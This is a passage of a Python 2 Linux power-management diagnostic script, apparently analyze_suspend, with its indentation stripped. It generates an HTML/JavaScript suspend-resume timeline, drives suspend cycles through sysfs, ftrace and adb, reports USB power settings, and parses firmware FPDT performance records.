.thread {position: absolute; height: '+'%.3f'%thread_height+'%; overflow: hidden; line-height: 30px; border:1px solid;text-align:center;white-space:nowrap;background-color:rgba(204,204,204,0.5);}\n\
.thread:hover {background-color:white;border:1px solid red;z-index:10;}\n\
.hover {background-color:white;border:1px solid red;z-index:10;}\n\
.traceevent {position: absolute;opacity: 0.3;height: '+'%.3f'%thread_height+'%;width:0;overflow:hidden;line-height:30px;text-align:center;white-space:nowrap;}\n\
.phase {position: absolute;overflow: hidden;border:0px;text-align:center;}\n\
.phaselet {position:absolute;overflow:hidden;border:0px;text-align:center;height:100px;font-size:24px;}\n\
.t {position:absolute;top:0%;height:100%;border-right:1px solid black;}\n\
.legend {position: relative; width: 100%; height: 40px; text-align: center;margin-bottom:20px}\n\
.legend .square {position:absolute;top:10px; width: 0px;height: 20px;border:1px solid;padding-left:20px;}\n\
button {height:40px;width:200px;margin-bottom:20px;margin-top:20px;font-size:24px;}\n\
.devlist {position:'+x2changes[1]+';width:190px;}\n\
#devicedetail {height:100px;box-shadow: 5px 5px 20px black;}\n\
</style>\n</head>\n<body>\n'
hf.write(html_header)
# write the test title and general info header
if(sysvals.stamp['time'] != ""):
hf.write(headline_stamp.format(sysvals.stamp['host'],
sysvals.stamp['kernel'], sysvals.stamp['mode'], \
sysvals.stamp['time']))
# write the device timeline
hf.write(devtl.html['timeline'])
hf.write(devtl.html['legend'])
hf.write('<div id="devicedetailtitle"></div>\n')
hf.write('<div id="devicedetail" style="display:none;">\n')
# draw the colored boxes for the device detail section
for data in testruns:
hf.write('<div id="devicedetail%d">\n' % data.testnumber)
for b in data.phases:
phase = data.dmesg[b]
length = phase['end']-phase['start']
left = '%.3f' % (((phase['start']-t0)*100.0)/tTotal)
width = '%.3f' % ((length*100.0)/tTotal)
hf.write(html_phaselet.format(b, left, width, \
data.dmesg[b]['color']))
hf.write('</div>\n')
hf.write('</div>\n')
# write the ftrace data (callgraph)
data = testruns[-1]
if(sysvals.usecallgraph):
hf.write('<section id="callgraphs" class="callgraph">\n')
# write out the ftrace data converted to html
html_func_top = '<article id="{0}" class="atop" style="background-color:{1}">\n<input type="checkbox" class="pf" id="f{2}" checked/><label for="f{2}">{3} {4}</label>\n'
html_func_start = '<article>\n<input type="checkbox" class="pf" id="f{0}" checked/><label for="f{0}">{1} {2}</label>\n'
html_func_end = '</article>\n'
html_func_leaf = '<article>{0} {1}</article>\n'
num = 0
for p in data.phases:
list = data.dmesg[p]['list']
for devname in data.sortedDevices(p):
if('ftrace' not in list[devname]):
continue
name = devname
if(devname in sysvals.altdevname):
name = sysvals.altdevname[devname]
devid = list[devname]['id']
cg = list[devname]['ftrace']
flen = '<r>(%.3f ms @ %.3f to %.3f)</r>' % \
((cg.end - cg.start)*1000, cg.start*1000, cg.end*1000)
hf.write(html_func_top.format(devid, data.dmesg[p]['color'], \
num, name+' '+p, flen))
num += 1
for line in cg.list:
if(line.length < 0.000000001):
flen = ''
else:
flen = '<n>(%.3f ms @ %.3f)</n>' % (line.length*1000, \
line.time*1000)
if(line.freturn and line.fcall):
hf.write(html_func_leaf.format(line.name, flen))
elif(line.freturn):
hf.write(html_func_end)
else:
hf.write(html_func_start.format(num, line.name, flen))
num += 1
hf.write(html_func_end)
hf.write('\n\n </section>\n')
# write the footer and close
addScriptCode(hf, testruns)
hf.write('</body>\n</html>\n')
hf.close()
return True
# Function: addScriptCode
# Description:
# Adds the javascript code to the output html
# Arguments:
# hf: the open html file pointer
# testruns: array of Data objects from parseKernelLog or parseTraceLog
def addScriptCode(hf, testruns):
t0 = (testruns[0].start - testruns[-1].tSuspended) * 1000
tMax = (testruns[-1].end - testruns[-1].tSuspended) * 1000
# create an array in javascript memory with the device details
detail = ' var devtable = [];\n'
for data in testruns:
topo = data.deviceTopology()
detail += ' devtable[%d] = "%s";\n' % (data.testnumber, topo)
detail += ' var bounds = [%f,%f];\n' % (t0, tMax)
# add the code which will manipulate the data in the browser
script_code = \
'<script type="text/javascript">\n'+detail+\
' function zoomTimeline() {\n'\
' var timescale = document.getElementById("timescale");\n'\
' var dmesg = document.getElementById("dmesg");\n'\
' var zoombox = document.getElementById("dmesgzoombox");\n'\
' var val = parseFloat(dmesg.style.width);\n'\
' var newval = 100;\n'\
' var sh = window.outerWidth / 2;\n'\
' if(this.id == "zoomin") {\n'\
' newval = val * 1.2;\n'\
' if(newval > 40000) newval = 40000;\n'\
' dmesg.style.width = newval+"%";\n'\
' zoombox.scrollLeft = ((zoombox.scrollLeft + sh) * newval / val) - sh;\n'\
' } else if (this.id == "zoomout") {\n'\
' newval = val / 1.2;\n'\
' if(newval < 100) newval = 100;\n'\
' dmesg.style.width = newval+"%";\n'\
' zoombox.scrollLeft = ((zoombox.scrollLeft + sh) * newval / val) - sh;\n'\
' } else {\n'\
' zoombox.scrollLeft = 0;\n'\
' dmesg.style.width = "100%";\n'\
' }\n'\
' var html = "";\n'\
' var t0 = bounds[0];\n'\
' var tMax = bounds[1];\n'\
' var tTotal = tMax - t0;\n'\
' var wTotal = tTotal * 100.0 / newval;\n'\
' for(var tS = 1000; (wTotal / tS) < 3; tS /= 10);\n'\
' if(tS < 1) tS = 1;\n'\
' for(var s = ((t0 / tS)|0) * tS; s < tMax; s += tS) {\n'\
' var pos = (tMax - s) * 100.0 / tTotal;\n'\
' var name = (s == 0)?"S/R":(s+"ms");\n'\
' html += "<div class=\\"t\\" style=\\"right:"+pos+"%\\">"+name+"</div>";\n'\
' }\n'\
' timescale.innerHTML = html;\n'\
' }\n'\
' function deviceHover() {\n'\
' var name = this.title.slice(0, this.title.indexOf(" ("));\n'\
' var dmesg = document.getElementById("dmesg");\n'\
' var dev = dmesg.getElementsByClassName("thread");\n'\
' var cpu = -1;\n'\
' if(name.match("CPU_ON\[[0-9]*\]"))\n'\
' cpu = parseInt(name.slice(7));\n'\
' else if(name.match("CPU_OFF\[[0-9]*\]"))\n'\
' cpu = parseInt(name.slice(8));\n'\
' for (var i = 0; i < dev.length; i++) {\n'\
' dname = dev[i].title.slice(0, dev[i].title.indexOf(" ("));\n'\
' if((cpu >= 0 && dname.match("CPU_O[NF]*\\\[*"+cpu+"\\\]")) ||\n'\
' (name == dname))\n'\
' {\n'\
' dev[i].className = "thread hover";\n'\
' } else {\n'\
' dev[i].className = "thread";\n'\
' }\n'\
' }\n'\
' }\n'\
' function deviceUnhover() {\n'\
' var dmesg = document.getElementById("dmesg");\n'\
' var dev = dmesg.getElementsByClassName("thread");\n'\
' for (var i = 0; i < dev.length; i++) {\n'\
' dev[i].className = "thread";\n'\
' }\n'\
' }\n'\
' function deviceTitle(title, total, cpu) {\n'\
' var prefix = "Total";\n'\
' if(total.length > 3) {\n'\
' prefix = "Average";\n'\
' total[1] = (total[1]+total[3])/2;\n'\
' total[2] = (total[2]+total[4])/2;\n'\
' }\n'\
' var devtitle = document.getElementById("devicedetailtitle");\n'\
' var name = title.slice(0, title.indexOf(" "));\n'\
' if(cpu >= 0) name = "CPU"+cpu;\n'\
' var driver = "";\n'\
' var tS = "<t2>(</t2>";\n'\
' var tR = "<t2>)</t2>";\n'\
' if(total[1] > 0)\n'\
' tS = "<t2>("+prefix+" Suspend:</t2><t0> "+total[1].toFixed(3)+" ms</t0> ";\n'\
' if(total[2] > 0)\n'\
' tR = " <t2>"+prefix+" Resume:</t2><t0> "+total[2].toFixed(3)+" ms<t2>)</t2></t0>";\n'\
' var s = title.indexOf("{");\n'\
' var e = title.indexOf("}");\n'\
' if((s >= 0) && (e >= 0))\n'\
' driver = title.slice(s+1, e) + " <t1>@</t1> ";\n'\
' if(total[1] > 0 && total[2] > 0)\n'\
' devtitle.innerHTML = "<t0>"+driver+name+"</t0> "+tS+tR;\n'\
' else\n'\
' devtitle.innerHTML = "<t0>"+title+"</t0>";\n'\
' return name;\n'\
' }\n'\
' function deviceDetail() {\n'\
' var devinfo = document.getElementById("devicedetail");\n'\
' devinfo.style.display = "block";\n'\
' var name = this.title.slice(0, this.title.indexOf(" ("));\n'\
' var cpu = -1;\n'\
' if(name.match("CPU_ON\[[0-9]*\]"))\n'\
' cpu = parseInt(name.slice(7));\n'\
' else if(name.match("CPU_OFF\[[0-9]*\]"))\n'\
' cpu = parseInt(name.slice(8));\n'\
' var dmesg = document.getElementById("dmesg");\n'\
' var dev = dmesg.getElementsByClassName("thread");\n'\
' var idlist = [];\n'\
' var pdata = [[]];\n'\
' var pd = pdata[0];\n'\
' var total = [0.0, 0.0, 0.0];\n'\
' for (var i = 0; i < dev.length; i++) {\n'\
' dname = dev[i].title.slice(0, dev[i].title.indexOf(" ("));\n'\
' if((cpu >= 0 && dname.match("CPU_O[NF]*\\\[*"+cpu+"\\\]")) ||\n'\
' (name == dname))\n'\
' {\n'\
' idlist[idlist.length] = dev[i].id;\n'\
' var tidx = 1;\n'\
' if(dev[i].id[0] == "a") {\n'\
' pd = pdata[0];\n'\
' } else {\n'\
' if(pdata.length == 1) pdata[1] = [];\n'\
' if(total.length == 3) total[3]=total[4]=0.0;\n'\
' pd = pdata[1];\n'\
' tidx = 3;\n'\
' }\n'\
' var info = dev[i].title.split(" ");\n'\
' var pname = info[info.length-1];\n'\
' pd[pname] = parseFloat(info[info.length-3].slice(1));\n'\
' total[0] += pd[pname];\n'\
' if(pname.indexOf("suspend") >= 0)\n'\
' total[tidx] += pd[pname];\n'\
' else\n'\
' total[tidx+1] += pd[pname];\n'\
' }\n'\
' }\n'\
' var devname = deviceTitle(this.title, total, cpu);\n'\
' var left = 0.0;\n'\
' for (var t = 0; t < pdata.length; t++) {\n'\
' pd = pdata[t];\n'\
' devinfo = document.getElementById("devicedetail"+t);\n'\
' var phases = devinfo.getElementsByClassName("phaselet");\n'\
' for (var i = 0; i < phases.length; i++) {\n'\
' if(phases[i].id in pd) {\n'\
' var w = 100.0*pd[phases[i].id]/total[0];\n'\
' var fs = 32;\n'\
' if(w < 8) fs = 4*w | 0;\n'\
' var fs2 = fs*3/4;\n'\
' phases[i].style.width = w+"%";\n'\
' phases[i].style.left = left+"%";\n'\
' phases[i].title = phases[i].id+" "+pd[phases[i].id]+" ms";\n'\
' left += w;\n'\
' var time = "<t4 style=\\"font-size:"+fs+"px\\">"+pd[phases[i].id]+" ms<br></t4>";\n'\
' var pname = "<t3 style=\\"font-size:"+fs2+"px\\">"+phases[i].id.replace("_", " ")+"</t3>";\n'\
' phases[i].innerHTML = time+pname;\n'\
' } else {\n'\
' phases[i].style.width = "0%";\n'\
' phases[i].style.left = left+"%";\n'\
' }\n'\
' }\n'\
' }\n'\
' var cglist = document.getElementById("callgraphs");\n'\
' if(!cglist) return;\n'\
' var cg = cglist.getElementsByClassName("atop");\n'\
' for (var i = 0; i < cg.length; i++) {\n'\
' if(idlist.indexOf(cg[i].id) >= 0) {\n'\
' cg[i].style.display = "block";\n'\
' } else {\n'\
' cg[i].style.display = "none";\n'\
' }\n'\
' }\n'\
' }\n'\
' function devListWindow(e) {\n'\
' var sx = e.clientX;\n'\
' if(sx > window.innerWidth - 440)\n'\
' sx = window.innerWidth - 440;\n'\
' var cfg="top="+e.screenY+", left="+sx+", width=440, height=720, scrollbars=yes";\n'\
' var win = window.open("", "_blank", cfg);\n'\
' if(window.chrome) win.moveBy(sx, 0);\n'\
' var html = "<title>"+e.target.innerHTML+"</title>"+\n'\
' "<style type=\\"text/css\\">"+\n'\
' " ul {list-style-type:circle;padding-left:10px;margin-left:10px;}"+\n'\
' "</style>"\n'\
' var dt = devtable[0];\n'\
' if(e.target.id != "devlist1")\n'\
' dt = devtable[1];\n'\
' win.document.write(html+dt);\n'\
' }\n'\
' window.addEventListener("load", function () {\n'\
' var dmesg = document.getElementById("dmesg");\n'\
' dmesg.style.width = "100%"\n'\
' document.getElementById("zoomin").onclick = zoomTimeline;\n'\
' document.getElementById("zoomout").onclick = zoomTimeline;\n'\
' document.getElementById("zoomdef").onclick = zoomTimeline;\n'\
' var devlist = document.getElementsByClassName("devlist");\n'\
' for (var i = 0; i < devlist.length; i++)\n'\
' devlist[i].onclick = devListWindow;\n'\
' var dev = dmesg.getElementsByClassName("thread");\n'\
' for (var i = 0; i < dev.length; i++) {\n'\
' dev[i].onclick = deviceDetail;\n'\
' dev[i].onmouseover = deviceHover;\n'\
' dev[i].onmouseout = deviceUnhover;\n'\
' }\n'\
' zoomTimeline();\n'\
' });\n'\
'</script>\n'
hf.write(script_code);
# Function: executeSuspend
# Description:
# Execute system suspend through the sysfs interface, then copy the output
# dmesg and ftrace files to the test output directory.
def executeSuspend():
global sysvals
detectUSB(False)
t0 = time.time()*1000
tp = sysvals.tpath
# execute however many s/r runs requested
for count in range(1,sysvals.execcount+1):
# clear the kernel ring buffer just as we start
os.system('dmesg -C')
# enable callgraph ftrace only for the second run
if(sysvals.usecallgraph and count == 2):
# set trace type
os.system('echo function_graph > '+tp+'current_tracer')
os.system('echo "" > '+tp+'set_ftrace_filter')
# set trace format options
os.system('echo funcgraph-abstime > '+tp+'trace_options')
os.system('echo funcgraph-proc > '+tp+'trace_options')
# focus only on device suspend and resume
os.system('cat '+tp+'available_filter_functions | '+\
'grep dpm_run_callback > '+tp+'set_graph_function')
# if this is test2 and there's a delay, start here
if(count > 1 and sysvals.x2delay > 0):
tN = time.time()*1000
while (tN - t0) < sysvals.x2delay:
tN = time.time()*1000
time.sleep(0.001)
# start ftrace
if(sysvals.usecallgraph or sysvals.usetraceevents):
print('START TRACING')
os.system('echo 1 > '+tp+'tracing_on')
# initiate suspend
if(sysvals.usecallgraph or sysvals.usetraceevents):
os.system('echo SUSPEND START > '+tp+'trace_marker')
if(sysvals.rtcwake):
print('SUSPEND START')
print('will autoresume in %d seconds' % sysvals.rtcwaketime)
sysvals.rtcWakeAlarm()
else:
print('SUSPEND START (press a key to resume)')
pf = open(sysvals.powerfile, 'w')
pf.write(sysvals.suspendmode)
# execution will pause here
pf.close()
t0 = time.time()*1000
# return from suspend
print('RESUME COMPLETE')
if(sysvals.usecallgraph or sysvals.usetraceevents):
os.system('echo RESUME COMPLETE > '+tp+'trace_marker')
# see if there's firmware timing data to be had
t = sysvals.postresumetime
if(t > 0):
print('Waiting %d seconds for POST-RESUME trace events...' % t)
time.sleep(t)
# stop ftrace
if(sysvals.usecallgraph or sysvals.usetraceevents):
os.system('echo 0 > '+tp+'tracing_on')
print('CAPTURING TRACE')
writeDatafileHeader(sysvals.ftracefile)
os.system('cat '+tp+'trace >> '+sysvals.ftracefile)
os.system('echo "" > '+tp+'trace')
# grab a copy of the dmesg output
print('CAPTURING DMESG')
writeDatafileHeader(sysvals.dmesgfile)
os.system('dmesg -c >> '+sysvals.dmesgfile)
def writeDatafileHeader(filename):
global sysvals
fw = getFPDT(False)
prt = sysvals.postresumetime
fp = open(filename, 'a')
fp.write(sysvals.teststamp+'\n')
if(fw):
fp.write('# fwsuspend %u fwresume %u\n' % (fw[0], fw[1]))
if(prt > 0):
fp.write('# post resume time %u\n' % prt)
fp.close()
# Function: executeAndroidSuspend
# Description:
# Execute system suspend through the sysfs interface
# on a remote android device, then transfer the output
# dmesg and ftrace files to the local output directory.
def executeAndroidSuspend():
global sysvals
# check to see if the display is currently off
tp = sysvals.tpath
out = os.popen(sysvals.adb+\
' shell dumpsys power | grep mScreenOn').read().strip()
# if so we need to turn it on so we can issue a new suspend
if(out.endswith('false')):
print('Waking the device up for the test...')
# send the KEYPAD_POWER keyevent to wake it up
os.system(sysvals.adb+' shell input keyevent 26')
# wait a few seconds so the user can see the device wake up
time.sleep(3)
# execute however many s/r runs requested
for count in range(1,sysvals.execcount+1):
# clear the kernel ring buffer just as we start
os.system(sysvals.adb+' shell dmesg -c > /dev/null 2>&1')
# start ftrace
if(sysvals.usetraceevents):
print('START TRACING')
os.system(sysvals.adb+" shell 'echo 1 > "+tp+"tracing_on'")
# initiate suspend
for count in range(1,sysvals.execcount+1):
if(sysvals.usetraceevents):
os.system(sysvals.adb+\
" shell 'echo SUSPEND START > "+tp+"trace_marker'")
print('SUSPEND START (press a key on the device to resume)')
os.system(sysvals.adb+" shell 'echo "+sysvals.suspendmode+\
" > "+sysvals.powerfile+"'")
# execution will pause here, then adb will exit
while(True):
check = os.popen(sysvals.adb+\
' shell pwd 2>/dev/null').read().strip()
if(len(check) > 0):
break
time.sleep(1)
if(sysvals.usetraceevents):
os.system(sysvals.adb+" shell 'echo RESUME COMPLETE > "+tp+\
"trace_marker'")
# return from suspend
print('RESUME COMPLETE')
# stop ftrace
if(sysvals.usetraceevents):
os.system(sysvals.adb+" shell 'echo 0 > "+tp+"tracing_on'")
print('CAPTURING TRACE')
os.system('echo "'+sysvals.teststamp+'" > '+sysvals.ftracefile)
os.system(sysvals.adb+' shell cat '+tp+\
'trace >> '+sysvals.ftracefile)
# grab a copy of the dmesg output
print('CAPTURING DMESG')
os.system('echo "'+sysvals.teststamp+'" > '+sysvals.dmesgfile)
os.system(sysvals.adb+' shell dmesg >> '+sysvals.dmesgfile)
# Function: setUSBDevicesAuto
# Description:
# Set the autosuspend control parameter of all USB devices to auto
# This can be dangerous, so use at your own risk, most devices are set
# to always-on since the kernel cant determine if the device can
# properly autosuspend
def setUSBDevicesAuto():
global sysvals
rootCheck()
for dirname, dirnames, filenames in os.walk('/sys/devices'):
if(re.match('.*/usb[0-9]*.*', dirname) and
'idVendor' in filenames and 'idProduct' in filenames):
os.system('echo auto > %s/power/control' % dirname)
name = dirname.split('/')[-1]
desc = os.popen('cat %s/product 2>/dev/null' % \
dirname).read().replace('\n', '')
ctrl = os.popen('cat %s/power/control 2>/dev/null' % \
dirname).read().replace('\n', '')
print('control is %s for %6s: %s' % (ctrl, name, desc))
# Function: yesno
# Description:
# Print out an equivalent Y or N for a set of known parameter values
# Output:
# 'Y', 'N', or ' ' if the value is unknown
def yesno(val):
yesvals = ['auto', 'enabled', 'active', '1']
novals = ['on', 'disabled', 'suspended', 'forbidden', 'unsupported']
if val in yesvals:
return 'Y'
elif val in novals:
return 'N'
return ' '
# Function: ms2nice
# Description:
# Print out a very concise time string in minutes and seconds
# Output:
# The time string, e.g. "1901m16s"
def ms2nice(val):
ms = 0
try:
ms = int(val)
except:
return 0.0
m = ms / 60000
s = (ms / 1000) - (m * 60)
return '%3dm%2ds' % (m, s)
# Function: detectUSB
# Description:
# Detect all the USB hosts and devices currently connected and add
# a list of USB device names to sysvals for better timeline readability
# Arguments:
# output: True to output the info to stdout, False otherwise
def detectUSB(output):
global sysvals
field = {'idVendor':'', 'idProduct':'', 'product':'', 'speed':''}
power = {'async':'', 'autosuspend':'', 'autosuspend_delay_ms':'',
'control':'', 'persist':'', 'runtime_enabled':'',
'runtime_status':'', 'runtime_usage':'',
'runtime_active_time':'',
'runtime_suspended_time':'',
'active_duration':'',
'connected_duration':''}
if(output):
print('LEGEND')
print('---------------------------------------------------------------------------------------------')
print(' A = async/sync PM queue Y/N D = autosuspend delay (seconds)')
print(' S = autosuspend Y/N rACTIVE = runtime active (min/sec)')
print(' P = persist across suspend Y/N rSUSPEN = runtime suspend (min/sec)')
print(' E = runtime suspend enabled/forbidden Y/N ACTIVE = active duration (min/sec)')
print(' R = runtime status active/suspended Y/N CONNECT = connected duration (min/sec)')
print(' U = runtime usage count')
print('---------------------------------------------------------------------------------------------')
print(' NAME ID DESCRIPTION SPEED A S P E R U D rACTIVE rSUSPEN ACTIVE CONNECT')
print('---------------------------------------------------------------------------------------------')
for dirname, dirnames, filenames in os.walk('/sys/devices'):
if(re.match('.*/usb[0-9]*.*', dirname) and
'idVendor' in filenames and 'idProduct' in filenames):
for i in field:
field[i] = os.popen('cat %s/%s 2>/dev/null' % \
(dirname, i)).read().replace('\n', '')
name = dirname.split('/')[-1]
if(len(field['product']) > 0):
sysvals.altdevname[name] = \
'%s [%s]' % (field['product'], name)
else:
sysvals.altdevname[name] = \
'%s:%s [%s]' % (field['idVendor'], \
field['idProduct'], name)
if(output):
for i in power:
power[i] = os.popen('cat %s/power/%s 2>/dev/null' % \
(dirname, i)).read().replace('\n', '')
if(re.match('usb[0-9]*', name)):
first = '%-8s' % name
else:
first = '%8s' % name
print('%s [%s:%s] %-20s %-4s %1s %1s %1s %1s %1s %1s %1s %s %s %s %s' % \
(first, field['idVendor'], field['idProduct'], \
field['product'][0:20], field['speed'], \
yesno(power['async']), \
yesno(power['control']), \
yesno(power['persist']), \
yesno(power['runtime_enabled']), \
yesno(power['runtime_status']), \
power['runtime_usage'], \
power['autosuspend'], \
ms2nice(power['runtime_active_time']), \
ms2nice(power['runtime_suspended_time']), \
ms2nice(power['active_duration']), \
ms2nice(power['connected_duration'])))
# Function: getModes
# Description:
# Determine the supported power modes on this system
# Output:
# A string list of the available modes
def getModes():
global sysvals
modes = ''
if(not sysvals.android):
if(os.path.exists(sysvals.powerfile)):
fp = open(sysvals.powerfile, 'r')
modes = string.split(fp.read())
fp.close()
else:
line = os.popen(sysvals.adb+' shell cat '+\
sysvals.powerfile).read().strip()
modes = string.split(line)
return modes
# Function: getFPDT
# Description:
# Read the acpi bios tables and pull out FPDT, the firmware data
# Arguments:
# output: True to output the info to stdout, False otherwise
def getFPDT(output):
global sysvals
rectype = {}
rectype[0] = 'Firmware Basic Boot Performance Record'
rectype[1] = 'S3 Performance Table Record'
prectype = {}
prectype[0] = 'Basic S3 Resume Performance Record'
prectype[1] = 'Basic S3 Suspend Performance Record'
rootCheck()
if(not os.path.exists(sysvals.fpdtpath)):
if(output):
doError('file doesnt exist: %s' % sysvals.fpdtpath, False)
return False
if(not os.access(sysvals.fpdtpath, os.R_OK)):
if(output):
doError('file isnt readable: %s' % sysvals.fpdtpath, False)
return False
if(not os.path.exists(sysvals.mempath)):
if(output):
doError('file doesnt exist: %s' % sysvals.mempath, False)
return False
if(not os.access(sysvals.mempath, os.R_OK)):
if(output):
doError('file isnt readable: %s' % sysvals.mempath, False)
return False
fp = open(sysvals.fpdtpath, 'rb')
buf = fp.read()
fp.close()
if(len(buf) < 36):
if(output):
doError('Invalid FPDT table data, should '+\
'be at least 36 bytes', False)
return False
table = struct.unpack('4sIBB6s8sI4sI', buf[0:36])
if(output):
print('')
print('Firmware Performance Data Table (%s)' % table[0])
print(' Signature : %s' % table[0])
print(' Table Length : %u' % table[1])
print(' Revision : %u' % table[2])
print(' Checksum : 0x%x' % table[3])
print(' OEM ID : %s' % table[4])
print(' OEM Table ID : %s' % table[5])
print(' OEM Revision : %u' % table[6])
print(' Creator ID : %s' % table[7])
print(' Creator Revision : 0x%x' % table[8])
print('')
if(table[0] != 'FPDT'):
if(output):
doError('Invalid FPDT table')
return False
if(len(buf) <= 36):
return False
i = 0
fwData = [0, 0]
records = buf[36:]
fp = open(sysvals.mempath, 'rb')
while(i < len(records)):
header = struct.unpack('HBB', records[i:i+4])
if(header[0] not in rectype):
continue
if(header[1] != 16):
continue
addr = struct.unpack('Q', records[i+8:i+16])[0]
try:
fp.seek(addr)
first = fp.read(8)
except:
doError('Bad address 0x%x in %s' % (addr, sysvals.mempath), False)
rechead = struct.unpack('4sI', first)
recdata = fp.read(rechead[1]-8)
if(rechead[0] == 'FBPT'):
record = struct.unpack('HBBIQQQQQ', recdata)
if(output):
print('%s (%s)' % (rectype[header[0]], rechead[0]))
print(' Reset END : %u ns' % record[4])
print(' OS Loader LoadImage Start : %u ns' % record[5])
print(' OS Loader StartImage Start : %u ns' % record[6])
print(' ExitBootServices Entry : %u ns' % record[7])
print(' ExitBootServices Exit : %u ns' % record[8])
elif(rechead[0] == 'S3PT'):
if(output):
print('%s (%s)' % (rectype[header[0]], rechead[0]))
j = 0
while(j < len(recdata)):
prechead = struct.unpack('HBB', recdata[j:j+4])
if(prechead[0] not in prectype):
continue
if(prechead[0] == 0):
record = struct.unpack('IIQQ', recdata[j:j+prechead[1]])
fwData[1] = record[2]
if(output):
print(' %s' % prectype[prechead[0]])
print(' Resume Count : %u' % \
record[1])
print(' FullResume : %u ns' % \
record[2])
print(' AverageResume : %u ns' % \
record[3])
elif(prechead[0] == 1):
record = struct.unpack('QQ', recdata[j+4:j+prechead[1]])
fwData[0] = record[1] - record[0]
if(output):
print(' %s' % prectype[prechead[0]])
print(' SuspendStart : %u ns' % \
record[0])
print(' SuspendEnd : %u ns' % \
record[1])
print(' SuspendTime : %u ns' % \
fwData[0])
j += prechead[1]
if(output):
print('')
i += header[1]
fp.close()
return fwData
# Function: statusCheck
# Description:
# Verify that the requested command and options will work, and
# print the results to the terminal
# Output:
# True if the test will work, False if not
def statusCheck():
global sysvals
status = True
if(sysvals.android):
print('Checking the android system ...')
else:
print('Checking this system (%s)...' % platform.node())
# check if adb is connected to a device
if(sysvals.android):
res = 'NO'
out = os.popen(sysvals.adb+' get-state').read().strip()
if(out == 'device'):
res = 'YES'
print(' is android device connected: %s' % res)
if(res != 'YES'):
print(' Please connect the device before using this tool')
return False
# check we have root access
res = 'NO (No features of this tool will work!)'
if(sysvals.android):
out = os.popen(sysvals.adb+' shell id').read().strip()
if('root' in out):
res = 'YES'
else:
if(os.environ['USER'] == 'root'):
res = 'YES'
print(' have root access: %s' % res)
if(res != 'YES'):
if(sysvals.android):
print(' Try running "adb root" to restart the daemon as root')
else:
print(' Try running this script with sudo')
return False
# check sysfs is mounted
res = 'NO (No features of this tool will work!)'
if(sysvals.android):
out = os.popen(sysvals.adb+' shell ls '+\
sysvals.powerfile).read().strip()
if(out == sysvals.powerfile):
res = 'YES'
else:
if(os.path.exists(sysvals.powerfile)):
res = 'YES'
print(' is sysfs mounted: %s' % res)
if(res != 'YES'):
return False
# check target mode is a valid mode
res = 'NO'
modes = getModes()
if(sysvals.suspendmode in modes):
res = 'YES'
else:
status = False
print(' is "%s" a valid power mode: %s' % (sysvals.suspendmode, res))
if(res == 'NO'):
print(' valid power modes are: %s' % modes)
print(' please choose one with -m')
# check if the tool can unlock the device
if(sysvals.android):
res = 'YES'
out1 = os.popen(sysvals.adb+\
' shell dumpsys power | grep mScreenOn').read().strip()
out2 = os.popen(sysvals.adb+\
' shell input').read().strip()
if(not out1.startswith('mScreenOn') or not out2.startswith('usage')):
res = 'NO (wake the android device up before running the test)'
print(' can I unlock the screen: %s' % res)
# check if ftrace is available
res = 'NO'
ftgood = verifyFtrace()
if(ftgood):
res = 'YES'
elif(sysvals.usecallgraph):
status = False
print(' is ftrace supported: %s' % res)
# what data source are we using
res = 'DMESG'
if(ftgood):
sysvals.usetraceeventsonly = True
sysvals.usetraceevents = False
for e in sysvals.traceevents:
check = False
if(sysvals.android):
out = os.popen(sysvals.adb+' shell ls -d '+\
sysvals.epath+e).read().strip()
if(out == sysvals.epath+e):
check = True
else:
if(os.path.exists(sysvals.epath+e)):
check = True
if(not check):
sysvals.usetraceeventsonly = False
if(e == 'suspend_resume' and check):
sysvals.usetraceevents = True
if(sysvals.usetraceevents and sysvals.usetraceeventsonly):
res = 'FTRACE (all trace events found)'
elif(sysvals.usetraceevents):
res = 'DMESG and FTRACE (suspend_resume trace event found)'
print(' timeline data source: %s' % res)
# check if rtcwake
res = 'NO'
if(sysvals.rtcpath != ''):
res = 'YES'
elif(sysvals.rtcwake):
status = False
print(' is rtcwake supported: %s' % res)
return status
# Function: doError
# Description:
# generic error function for catastrphic failures
# Arguments:
# msg: the error message to print
# help: True if printHelp should be called after, False otherwise
def doError(msg, help):
if(help == True):
printHelp()
print('ERROR: %s\n') % msg
sys.exit()
# Function: doWarning
# Description:
# generic warning function for non-catastrophic anomalies
# Arguments:
# msg: the warning message to print
# file: If not empty, a filename to request be sent to the owner for debug
def doWarning(msg, file):
print('/* %s */') % msg
if(file):
print('/* For a fix, please send this'+\
' %s file to <todd.e.brandt@intel.com> */' % file)
# Function: rootCheck
# Description:
# quick check to see if we have root access
def rootCheck():
if(os.environ['USER'] != 'root'):
doError('This script must be run as root', False)
# Function: getArgInt
# Description:
# pull out an integer argument from the command line with checks
def getArgInt(name, args, min, max):
try:
arg = args.next()
except:
doError(name+': no argument supplied', True)
try:
val = int(arg)
except:
doError(name+': non-integer value given', True)
if(val < min or val > max):
doError(name+': value should be between %d and %d' % (min, max), True)
return val
# Function: rerunTest
# Description:
# generate an output from an existing set of ftrace/dmesg logs
def rerunTest():
global sysvals
if(sysvals.ftracefile != ''):
doesTraceLogHaveTraceEvents()
if(sysvals.dmesgfile == '' and not sysvals.usetraceeventsonly):
doError('recreating this html output '+\
'requires a dmesg file', False)
sysvals.setOutputFile()
vprint('Output file: %s' % sysvals.htmlfile)
print('PROCESSING DATA')
if(sysvals.usetraceeventsonly):
testruns = parseTraceLog()
else:
testruns = loadKernelLog()
for data in testruns:
parseKernelLog(data)
if(sysvals.ftracefile != ''):
appendIncompleteTraceLog(testruns)
createHTML(testruns)
# Function: runTest
# Description:
# execute a suspend/resume, gather the logs, and generate the output
def runTest(subdir):
global sysvals
# prepare for the test
if(not sysvals.android):
initFtrace()
else:
initFtraceAndroid()
sysvals.initTestOutput(subdir)
vprint('Output files:\n %s' % sysvals.dmesgfile)
if(sysvals.usecallgraph or
sysvals.usetraceevents or
sysvals.usetraceeventsonly):
vprint(' %s' % sysvals.ftracefile)
vprint(' %s' % sysvals.htmlfile)
# execute the test
if(not sysvals.android):
executeSuspend()
else:
executeAndroidSuspend()
# analyze the data and create the html output
print('PROCESSING DATA')
if(sysvals.usetraceeventsonly):
# data for kernels 3.15 or newer is entirely in ftrace
testruns = parseTraceLog()
else:
# data for kernels older than 3.15 is primarily in dmesg
testruns = loadKernelLog()
for data in testruns:
parseKernelLog(data)
if(sysvals.usecallgraph or sysvals.usetraceevents):
appendIncompleteTraceLog(testruns)
createHTML(testruns)
# Function: runSummary
# Description:
# create a summary of tests in a sub-directory
def runSummary(subdir, output):
global sysvals
# get a list of ftrace output files
files = []
for dirname, dirnames, filenames in os.walk(subdir):
for filename in filenames:
